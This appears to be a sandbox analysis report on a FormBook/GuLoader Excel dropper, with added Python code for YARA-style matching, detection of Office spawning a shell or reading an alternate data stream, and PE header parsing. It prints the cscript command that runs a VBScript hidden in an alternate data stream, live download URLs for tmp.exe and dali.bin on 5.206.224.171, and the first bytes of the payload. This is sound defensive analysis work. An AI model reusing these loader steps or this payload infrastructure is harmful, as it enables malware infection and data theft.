

Analysis Report Payment_Notification.pdf.csv

Overview

General Information

Sample Name:Payment_Notification.pdf.csv
MD5:86a9322007f88be40e4034ebc7368248
SHA1:522d6e7b2a55e1358072792065219ef71ac8992d
SHA256:fdfe1dc9c8056c69e4cb2b5370db0a4c3797b3ad375fe1039a19ce269bbb0c78


Detection

Detection: FormBook, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document exploit detected (process start blacklist hit)
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Sigma detected: Microsoft Office Product Spawning Windows Shell
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Downloads executable code via HTTP
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match


Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\mso8D7C.tmp
Rule: EXP_potential_CVE_2017_11882
Description: unknown
Author: ReversingLabs
Strings:
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0x580:$equation1: Equation Native
  • 0x8e6:$cmd: cmd
  • 0x912:$address: 12 0C 43 00
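The four string hits above are what the rule reports on the temporary OLE object that Excel cached; the offsets are where each pattern sits in the dropped file. The following is an added example (not the report's or ReversingLabs' code) that reproduces that matching logic in plain Python: it searches a buffer for the rule's strings, prints the hits in the report's `offset:$name: value` style, and applies an `all of them` condition, which is this example's assumption since the page does not show the rule's condition. The sample buffer is constructed to carry the same bytes at the same offsets the report lists.

```python
# Strings of the rule EXP_potential_CVE_2017_11882 exactly as the report lists them.
# The rule's condition is not shown on the page; "all of them" is this example's assumption.
RULE_STRINGS = {
    "$docfilemagic": bytes.fromhex("D0CF11E0A1B11AE1"),  # OLE2 compound-file signature
    "$equation1": b"Equation Native",                   # Equation Editor 3.0 object stream
    "$cmd": b"cmd",                                     # launched command, weak on its own
    # 0x00430C12 little-endian: a return address into EQNEDT32.EXE seen in public
    # CVE-2017-11882 exploits, which is why the rule treats it as a strong indicator.
    "$address": bytes.fromhex("120C4300"),
}


def find_all(buf: bytes, needle: bytes) -> list:
    """Every offset at which needle occurs in buf, including overlapping hits."""
    hits, i = [], buf.find(needle)
    while i != -1:
        hits.append(i)
        i = buf.find(needle, i + 1)
    return hits


def match_rule(buf: bytes, strings=RULE_STRINGS, condition=all):
    """Return (matched, hits); hits maps each string name to its offsets in buf."""
    hits = {name: find_all(buf, pat) for name, pat in strings.items()}
    return bool(condition(hits[name] for name in strings)), hits


def report_lines(hits: dict, strings=RULE_STRINGS) -> list:
    """Render hits the way the sandbox prints them, e.g. '0x580:$equation1: Equation Native'."""
    lines = []
    for name, offsets in hits.items():
        pat = strings[name]
        printable = all(32 <= b < 127 for b in pat)
        shown = pat.decode("ascii") if printable else pat.hex(" ").upper()
        lines += [f"{off:#x}:{name}: {shown}" for off in offsets]
    return lines


def build_sample(with_payload: bool = True) -> bytes:
    """Constructed 4 KiB buffer laid out like the dropped mso8D7C.tmp as the report describes it.
    with_payload=False leaves a plain Equation object without the exploit markers."""
    buf = bytearray(0x1000)
    buf[0x000:0x008] = RULE_STRINGS["$docfilemagic"]
    buf[0x580:0x580 + len(RULE_STRINGS["$equation1"])] = RULE_STRINGS["$equation1"]
    if with_payload:
        buf[0x8E6:0x8E9] = RULE_STRINGS["$cmd"]
        buf[0x912:0x916] = RULE_STRINGS["$address"]
    return bytes(buf)


if __name__ == "__main__":
    matched, hits = match_rule(build_sample())
    print("matched:", matched)
    for line in report_lines(hits):
        print("  •", line)
```

An OLE file that merely embeds an Equation Editor object also carries `$docfilemagic` and `$equation1`; only the combination with the `cmd` string and the hard-coded return address separates an exploit document from a legitimate one, so a triage script should require all strings (or at least `$address`) rather than firing on the Equation stream alone.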

Memory Dumps

Source: 00000004.00000003.1121140244.0000000006441000.00000004.00000001.sdmp
Rule: LokiBot_Dropper_Packed_R11_Feb18
Description: Auto-generated rule - file scan copy.pdf.r11
Author: Florian Roth
Strings:
  • 0xd7d8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

Source: 00000004.00000003.1120953960.0000000006457000.00000004.00000001.sdmp
Rule: LokiBot_Dropper_Packed_R11_Feb18
Description: Auto-generated rule - file scan copy.pdf.r11
Author: Florian Roth
Strings:
  • 0xe020:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x157d9:$sqlite3step: 68 34 1C 7B E1
  • 0x158ec:$sqlite3step: 68 34 1C 7B E1
  • 0x15808:$sqlite3text: 68 38 2A 90 C5
  • 0x1592d:$sqlite3text: 68 38 2A 90 C5
  • 0x1581b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15943:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x74c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x12b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x12c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x12dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x804a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x118bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x89e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x17ec7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x18eca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis
Data:
  Command: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
  CommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\cscript.exe
  NewProcessName: C:\Windows\SysWOW64\cscript.exe
  OriginalFileName: C:\Windows\SysWOW64\cscript.exe
  ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' 'C:\Users\user\Desktop\Payment_Notification.pdf.csv'
  ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
  ParentProcessId: 3068
  ProcessCommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
  ProcessId: 4928
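Two things in this event are worth detecting independently: Excel spawning a script host (the Sigma rule's parent/child pairing), and the argument `C:\programdata\asc.txt:script1.vbs`, which is an NTFS alternate data stream: the VBScript is hidden in a stream of an innocuous-looking text file, so a directory listing shows only `asc.txt`. The following is an added example, not the Sigma rule's own logic or the sandbox's code, that runs both checks over process-creation events with Sysmon-style field names. The parent and child executable lists and the sample events are this example's assumptions; the first event is built from the fields the report shows, the other two are benign look-alikes.

```python
import re
from dataclasses import dataclass

# Parent/child name sets in the spirit of the Sigma rule "Microsoft Office Product
# Spawning Windows Shell"; these lists are this example's assumption, not the rule's text.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe",
                  "mspub.exe", "visio.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "regsvr32.exe", "rundll32.exe", "wmic.exe", "msiexec.exe",
                  "certutil.exe", "bitsadmin.exe", "schtasks.exe", "hh.exe"}

# NTFS alternate data stream as a command-line argument: <drive>:\<path>:<stream>.
# The path part may not contain a colon, which keeps the drive letter's own colon
# from matching, and the stream part stops at whitespace or a backslash.
ADS_RE = re.compile(r'[A-Za-z]:\\[^\s:"]+:[^\s:\\"]+')


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating quotes and forward slashes."""
    return path.strip("'\"").replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


def evaluate(event: dict) -> list:
    """Apply both checks to one process-creation event (Sysmon EID 1 / 4688 style fields)."""
    findings = []
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        findings.append(Finding(event["ProcessId"], "office_spawns_shell", f"{parent} -> {child}"))
    for m in ADS_RE.finditer(event.get("CommandLine", "")):
        findings.append(Finding(event["ProcessId"], "ads_argument", m.group(0)))
    return findings


def scan(events) -> list:
    """All findings over a sequence of events, in event order."""
    return [f for e in events for f in evaluate(e)]


# Constructed events: the first is the report's cscript.exe launch, the others are
# benign look-alikes that a rule must not fire on.
SAMPLE_EVENTS = [
    {"ProcessId": 4928, "ParentProcessId": 3068,
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\cscript.exe",
     "CommandLine": r"C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs"},
    {"ProcessId": 3068, "ParentProcessId": 1234,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r"'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' 'C:\Users\user\Desktop\Payment_Notification.pdf.csv'"},
    {"ProcessId": 5120, "ParentProcessId": 777,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe C:\scripts\backup.vbs"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.rule}: {f.detail}")
```

The ADS check is deliberately separate from the Office-parent check: a script host reading from `file:stream` is suspicious whatever its parent, and it also catches the `dir /r`-invisible persistence that survives after the Office process is gone.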

    Signature Overview


AV Detection:

Yara detected FormBook
Source: Yara match, file source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: Payment_Notification.pdf.csv, Joe Sandbox ML: detected

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, process created: C:\Windows\SysWOW64\cscript.exe

    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 May 2020 11:47:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 13 May 2020 21:57:20 GMTETag: "15000-5a58eaa05d000"Accept-Ranges: bytesContent-Length: 86016Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 2c a0 d9 53 4d ce 8a 53 4d ce 8a 53 4d ce 8a d0 51 c0 8a 52 4d ce 8a 1c 6f c7 8a 55 4d ce 8a 65 6b c3 8a 52 4d ce 8a 52 69 63 68 53 4d ce 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 95 7e 51 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 01 00 00 20 00 00 00 00 00 00 08 15 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 02 00 07 00 04 00 00 00 00 00 00 00 00 50 01 00 00 10 00 00 13 93 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 22 01 00 28 00 00 00 00 40 01 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 16 01 00 00 10 00 00 00 20 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 28 0c 00 00 00 30 01 00 00 10 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 08 00 00 00 40 01 00 00 10 00 00 00 40 01 00 00 00 00 00 00 00 00 00 
00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /stream/tmp.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 5.206.224.171
    Source: global trafficHTTP traffic detected: GET /stream/dali.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 5.206.224.171Cache-Control: no-cache
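The `200 OK` response above is served as `application/x-msdos-program` with a Content-Length of 86016 and begins with `4d 5a` (MZ): the VBScript's WinHttpRequest fetch of `/stream/tmp.exe` is pulling a Windows executable, and the second request for `dali.bin` with a browser user agent is the next-stage download made by that executable. The following is an added example, not part of the report, that parses the PE headers out of the captured response bytes so the file can be triaged without ever executing it. The buffer is reconstructed from the first 0x250 bytes of the report's `Data Raw` dump (its long zero runs are written as `ZERO16`); the field offsets are those of the PE32 format, and the cross-check against Content-Length is this example's own addition.

```python
import struct

# Reconstructed from the report's "Data Raw" dump of the /stream/tmp.exe response
# (first 0x250 bytes: DOS header, PE/COFF header, optional header, three section
# headers and the bound-import table). Constructed for this example.
ZERO16 = "00" * 16
CAPTURED_PE_HEAD = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"   # 0x000  "MZ" DOS header
    "b8000000000000004000000000000000"   # 0x010
    + ZERO16 +                           # 0x020
    "000000000000000000000000c0000000"   # 0x030  e_lfanew = 0xC0
    "0e1fba0e00b409cd21b8014ccd215468"   # 0x040  DOS stub code
    "69732070726f6772616d2063616e6e6f"   # 0x050  "This program canno"
    "742062652072756e20696e20444f5320"   # 0x060  "t be run in DOS "
    "6d6f64652e0d0d0a2400000000000000"   # 0x070  "mode.\r\r\n$"
    "172ca0d9534dce8a534dce8a534dce8a"   # 0x080  Rich header (XOR-encoded)
    "d051c08a524dce8a1c6fc78a554dce8a"   # 0x090
    "656bc38a524dce8a52696368534dce8a"   # 0x0A0  ... "Rich" + key
    + ZERO16 +                           # 0x0B0
    "504500004c010300957e514a00000000"   # 0x0C0  "PE\0\0", Machine, NumberOfSections, TimeDateStamp
    "00000000e0000f010b01060000200100"   # 0x0D0  SizeOfOptionalHeader, Characteristics, Magic=PE32
    "00200000000000000815000000100000"   # 0x0E0  ..., AddressOfEntryPoint, BaseOfCode
    "00300100000040000010000000100000"   # 0x0F0  BaseOfData, ImageBase, alignments
    "04000000020007000400000000000000"   # 0x100  version fields
    "00500100001000001393010002000000"   # 0x110  SizeOfImage, SizeOfHeaders, CheckSum, Subsystem
    "00001000001000000000100000100000"   # 0x120  stack/heap sizes
    "00000000100000000000000000000000"   # 0x130  LoaderFlags, NumberOfRvaAndSizes=16, export dir
    "042201002800000000400100c8080000"   # 0x140  import dir, resource dir
    + ZERO16 + ZERO16 + ZERO16 + ZERO16 +  # 0x150  directories 3..10 unused
    "30020000200000000010000048010000"   # 0x190  bound-import dir, IAT dir
    + ZERO16 +                           # 0x1A0  directories 13..14 unused
    "00000000000000002e74657874000000"   # 0x1B0  directory 15, then ".text" section header
    "d4160100001000000020010000100000"   # 0x1C0
    "00000000000000000000000020000060"   # 0x1D0
    "2e64617461000000280c000000300100"   # 0x1E0  ".data"
    "00100000003001000000000000000000"   # 0x1F0
    "00000000400000c02e72737263000000"   # 0x200  ".rsrc"
    "c8080000004001000010000000400100"   # 0x210
    "00000000000000000000000040000040"   # 0x220
    "c31fb049100000000000000000000000"   # 0x230  bound-import descriptor
    "4d535642564d36302e444c4c00000000"   # 0x240  "MSVBVM60.DLL"
)


def parse_pe_head(buf: bytes, content_length: int = None) -> dict:
    """Parse the DOS/COFF/optional/section headers of a PE32 image whose first bytes are in buf."""
    if buf[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24                      # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", buf, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10B) is handled here")
    entry_rva = struct.unpack_from("<I", buf, opt + 16)[0]
    image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    size_of_image, size_of_headers = struct.unpack_from("<II", buf, opt + 56)
    subsystem = struct.unpack_from("<H", buf, opt + 68)[0]
    ndirs = struct.unpack_from("<I", buf, opt + 92)[0]
    dirs = [struct.unpack_from("<II", buf, opt + 96 + 8 * i) for i in range(ndirs)]

    sections, sec_off = [], opt + opt_size
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", buf, sec_off + 40 * i)
        flags = struct.unpack_from("<I", buf, sec_off + 40 * i + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "va": va, "vsize": vsize,
                         "raw_ptr": raw_ptr, "raw_size": raw_size, "flags": flags})

    # The bound-import table sits inside the headers, where RVA == file offset, so the
    # bound DLL name is readable from the captured bytes alone.
    bound_module, bound_rva = None, (dirs[11][0] if ndirs > 11 else 0)
    if bound_rva and bound_rva < size_of_headers:
        _ts, name_off, _nrefs = struct.unpack_from("<IHH", buf, bound_rva)
        start = bound_rva + name_off
        bound_module = buf[start:buf.index(b"\0", start)].decode("ascii")

    # A well-formed file ends where its last section's raw data ends; compare to Content-Length.
    expected_size = max(s["raw_ptr"] + s["raw_size"] for s in sections)
    return {"machine": machine, "timestamp": timestamp, "characteristics": characteristics,
            "entry_point": image_base + entry_rva, "image_base": image_base,
            "size_of_image": size_of_image, "subsystem": subsystem, "import_dir": dirs[1],
            "sections": sections, "bound_module": bound_module,
            "expected_file_size": expected_size,
            "size_matches_download": content_length is None or content_length == expected_size}


if __name__ == "__main__":
    info = parse_pe_head(CAPTURED_PE_HEAD, content_length=86016)
    print(f"machine=0x{info['machine']:x} entry=0x{info['entry_point']:x} "
          f"sections={[s['name'] for s in info['sections']]} bound={info['bound_module']}")
    print("download size consistent with section table:", info["size_matches_download"])
```

The parse shows a 32-bit GUI executable with three sections, an entry point at 0x401508 and a bound import of `MSVBVM60.DLL`, i.e. a Visual Basic 6 binary, which fits the `VB6.OLB` strings the LokiBot_Dropper rule matched in the memory dumps. Its expected on-disk size (0x15000, the end of `.rsrc`) equals the 86016-byte Content-Length, so the sandbox captured a complete, untruncated payload.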
    Source: unknown, TCP traffic detected without corresponding DNS query: 5.206.224.171 (43 identical entries)
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
    Source: explorer.exe, 00000008.00000002.1238355438.0000000005B00000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
    Source: cscript.exe, 00000004.00000003.1124659173.000000000376D000.00000004.00000001.sdmpString found in binary or memory: http://5.206.224.171/
    Source: cscript.exe, 00000004.00000003.1124659173.000000000376D000.00000004.00000001.sdmpString found in binary or memory: http://5.206.224.171/7
    Source: cscript.exe, 00000004.00000003.1124659173.000000000376D000.00000004.00000001.sdmpString found in binary or memory: http://5.206.224.171/n)
    Source: tmp.exe, 00000007.00000002.1241746778.000000000019C000.00000004.00000001.sdmp, tmp.exe, 00000007.00000002.1241831842.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://5.206.224.171/stream/dali.bin
    Source: cscript.exe, 00000004.00000003.1124659173.000000000376D000.00000004.00000001.sdmp, cscript.exe, 00000004.00000003.1121200388.00000000037E8000.00000004.00000001.sdmp, cscript.exe, 00000004.00000002.1135365146.00000000037AF000.00000004.00000001.sdmp, cscript.exe, 00000004.00000003.1123618439.00000000037BF000.00000004.00000001.sdmpString found in binary or memory: http://5.206.224.171/stream/tmp.exe
    Source: cscript.exe, 00000004.00000003.1127984302.0000000005960000.00000004.00000040.sdmpString found in binary or memory: http://5.206.224.171/stream/tmp.exe3p~
    Source: cscript.exe, 00000004.00000003.1123618439.00000000037BF000.00000004.00000001.sdmpString found in binary or memory: http://5.206.224.171/stream/tmp.exeDocument
    Source: cscript.exe, 00000004.00000002.1132078744.0000000003354000.00000004.00000010.sdmpString found in binary or memory: http://5.206.224.171/stream/tmp.exehttp://5.206.224.171/stream/tmp.exe
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238355438.0000000005B00000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
